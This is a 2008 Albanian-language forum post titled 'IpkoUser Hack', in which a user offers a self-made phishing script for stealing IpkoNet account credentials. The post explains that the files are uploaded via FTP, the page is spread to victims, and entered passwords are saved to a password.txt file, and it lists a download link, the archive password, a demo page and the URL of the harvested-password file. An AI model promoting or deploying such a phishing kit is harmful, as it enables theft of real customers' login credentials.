ForumForum  PortalliPortalli  PytėsoriPytėsori  KėrkoKėrko  RegjistrohuRegjistrohu  Lista AnėtarėveLista Anėtarėve  Grupet e AnėtarėveGrupet e Anėtarėve  identifikimiidentifikimi  

Share | 
 

 IpkoUser Hack

Shko poshtė 
AutoriMesazh
CraCker-Adi
V.I.P.
V.I.P.


Numri i postimeve : 44
Join date : 22/02/2008

MesazhTitulli: IpkoUser Hack   Sat Feb 23, 2008 10:21 am

Nje menyr e leht me hacku nje user t'IpkoNet-it osht me kit script qi e kum ba vet un

passi qi ti uploadojm fajllat n'FTP
dhe e shperndajm webin
kush e shkrun accountin dhe passwordin n'faqe at'her passwordi ruhet te file password.txt

Download:

Kodi:
http://conndor.net/ipkohack.rarPassword:

Kodi:
www.conndor.netDemo:

Kodi:
http://kookteam.altervista.org/ipkohack/pra tash ktu passwordi ruhet te:

Kodi:
http://kookteam.altervista.org/ipkohack/password.txt
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit
 
IpkoUser Hack
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
 :: AlbaFresh Design :: Program T3eja-
Kėrce tek: